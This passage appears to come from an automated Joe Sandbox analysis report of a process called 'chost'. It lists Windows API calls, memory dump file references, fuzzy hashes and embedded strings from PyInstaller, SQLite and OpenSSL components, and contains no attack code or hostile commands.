                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A212131A0C64342EA249B76F4D522AB7A0EB857E4F108279E6ADC3BE5DF6CD445C740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                                        • Opcode ID: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
                                                                                                                                                                                                                                        • Instruction ID: dfac49619780feb5d93848e7621fc4e5cfc3faa2b3d635ae4d3be7712b64e3f3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F8211630A0E246C1FA7467739AD213D5162DF447A4F14C7BCEABED6AD6DE2CA441C300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                        • String ID: CONOUT$
                                                                                                                                                                                                                                        • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                        • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                        • Instruction ID: 89c7e07bea03e281a3f6895b136475e7b3b963054bbb9bbe71837d890f7d4b54
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A119621718A4286E7609B63E8D5329E2A0FB88FE4F148278E95DC77A4DF3CD804C740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007
                                                                                                                                                                                                                                        • String ID: ..\s\ssl\statem\statem_clnt.c$SHA2-256$resumption$tls_process_new_session_ticket
                                                                                                                                                                                                                                        • API String ID: 3568877910-1635961163
                                                                                                                                                                                                                                        • Opcode ID: 04e8e58095ab4c29acf9aa88931abc93738d81869fce6a6a0b8aecbe2d7fc96d
                                                                                                                                                                                                                                        • Instruction ID: 3b277cf4e87799b1140748ed80967c0092e94524bcd0e71f18d5b878775d506b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04e8e58095ab4c29acf9aa88931abc93738d81869fce6a6a0b8aecbe2d7fc96d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6029E32B09B8281E7509B15E460BBD77A8FB84B84F548136EAAD4BBD9DF3CE545C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF694369216), ref: 00007FF694368592
                                                                                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF694369216), ref: 00007FF6943685E9
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694369400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6943645E4,00000000,00007FF694361985), ref: 00007FF694369439
                                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF694369216), ref: 00007FF694368678
                                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF694369216), ref: 00007FF6943686E4
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,00000000,00007FF694369216), ref: 00007FF6943686F5
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,00000000,00007FF694369216), ref: 00007FF69436870A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3462794448-0
                                                                                                                                                                                                                                        • Opcode ID: af5051bae1bb50e3ccf69b50d5ac14561a54b739df452b641c0904f08e36c6c8
                                                                                                                                                                                                                                        • Instruction ID: 1d260c8d88df7c3960d56c470f4246ca93e34f8170f56d9695635efa69ddb558
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: af5051bae1bb50e3ccf69b50d5ac14561a54b739df452b641c0904f08e36c6c8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 00418462B1968381E6349B33A5816AA7394FF88BC8F458179DF8DD7B89DE3CE501C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • unknown column "%s" in foreign key definition, xrefs: 00007FFDF70B6AFE
                                                                                                                                                                                                                                        • foreign key on %s should reference only one column of table %T, xrefs: 00007FFDF70B67D5
                                                                                                                                                                                                                                        • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFDF70B67FE
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007E142010
                                                                                                                                                                                                                                        • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                        • API String ID: 2636501453-272990098
                                                                                                                                                                                                                                        • Opcode ID: cf17cd173f1e0b57c51c08f832a2cc0fc0c966b1dd8d6c2570c7d36062597e18
                                                                                                                                                                                                                                        • Instruction ID: 43314256986ca9db73a81670f7f77406baf161e368d754af24813d571a44db8c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cf17cd173f1e0b57c51c08f832a2cc0fc0c966b1dd8d6c2570c7d36062597e18
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1D1BE6AB0978182EB208B199064EF96BB2EF55B84F448135EE6DC37C9DF3CE641D300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007E142010
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                        • API String ID: 2636501453-3727861699
                                                                                                                                                                                                                                        • Opcode ID: 3fa76793ff51000907a4173b9cd8982be06d5e4031eb3370abfe8fd6ce14fdfa
                                                                                                                                                                                                                                        • Instruction ID: 3e7688bf8fce7e8bf08598d788a6c4d7466d589ef8e8fbc4da31962c7ad01f01
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3fa76793ff51000907a4173b9cd8982be06d5e4031eb3370abfe8fd6ce14fdfa
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4FD19B7AB0868586DB60CF29E064AE9B3B5FF84B84F554032DE5D87798EF38D842D740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694368760: GetCurrentProcess.KERNEL32 ref: 00007FF694368780
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694368760: OpenProcessToken.ADVAPI32 ref: 00007FF694368793
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694368760: GetTokenInformation.ADVAPI32 ref: 00007FF6943687B8
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694368760: GetLastError.KERNEL32 ref: 00007FF6943687C2
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694368760: GetTokenInformation.ADVAPI32 ref: 00007FF694368802
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694368760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF69436881E
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694368760: CloseHandle.KERNEL32 ref: 00007FF694368836
                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00007FF694363C55), ref: 00007FF69436916C
                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00007FF694363C55), ref: 00007FF694369175
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                        • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                        • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                        • Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                                        • Instruction ID: 835401d8814f9f9f324a306e95aec387caf947763fc2ced7ac8516c4d305421c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84214F21A1874382F724AB32E9962EA7365FF88780F5480B9EA4DD3796DF3CD845C740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA,?,?,?,?,00007FF6943771FF), ref: 00007FF69437B347
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA,?,?,?,?,00007FF6943771FF), ref: 00007FF69437B37D
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA,?,?,?,?,00007FF6943771FF), ref: 00007FF69437B3AA
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA,?,?,?,?,00007FF6943771FF), ref: 00007FF69437B3BB
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA,?,?,?,?,00007FF6943771FF), ref: 00007FF69437B3CC
                                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA,?,?,?,?,00007FF6943771FF), ref: 00007FF69437B3E7
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                                        • Opcode ID: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
                                                                                                                                                                                                                                        • Instruction ID: e0e660be6139aedb7bc65fd876fe121ba12b3255fe05e402be53fa66be4464bb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14111530A0C642C2FA74A7739AD113D6192EF447A4F14C7BCE9AED67D6DE2CA481C701
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007E142010
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                        • API String ID: 2636501453-3727861699
                                                                                                                                                                                                                                        • Opcode ID: 67dc44a78d9e748f69a167c79ebf504151bc07e9d0180a1d626db382376bfe5e
                                                                                                                                                                                                                                        • Instruction ID: 0f6ad4dd4a2f7855670b46361c2943020b7923517159793d345ce6fa227664f4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67dc44a78d9e748f69a167c79ebf504151bc07e9d0180a1d626db382376bfe5e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D791D466B082C196D755CB26E5A0AFD7BA0FB40744F088136DBAD876C9DF3CE4A6D700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF694361B6A), ref: 00007FF69436295E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                        • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                        • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                        • Instruction ID: 0140eb5a2f4093fad854a4630648e13eb0062c883a5c13996e8e5e456cd7bad8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3231C962B1968292E7309773A8815EA7295FF887D4F408139FE8DC3755EF7CD546C600
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                        • String ID: Unhandled exception in script
                                                                                                                                                                                                                                        • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                        • Opcode ID: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
                                                                                                                                                                                                                                        • Instruction ID: 5d38c67b2b2d211b82ec4a952f5596d4b307ef1577acbea10c63d916ea519da5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 38315F7261968289EB30EB32E8952F97360FF89784F544179EA4D87B5ADF3CD104C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF69436918F,?,00007FF694363C55), ref: 00007FF694362BA0
                                                                                                                                                                                                                                        • MessageBoxW.USER32 ref: 00007FF694362C2A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                        • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                        • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                        • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                        • Instruction ID: 1ed238c28ff3441aacd5d3e953c375920b0b8e908db4c8850ad09c56c7be8d23
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5121A372708B4292E7209B26F8857AA73A4EB88780F40813AEA8DD7756DE3CD605C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF694361B99), ref: 00007FF694362760
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
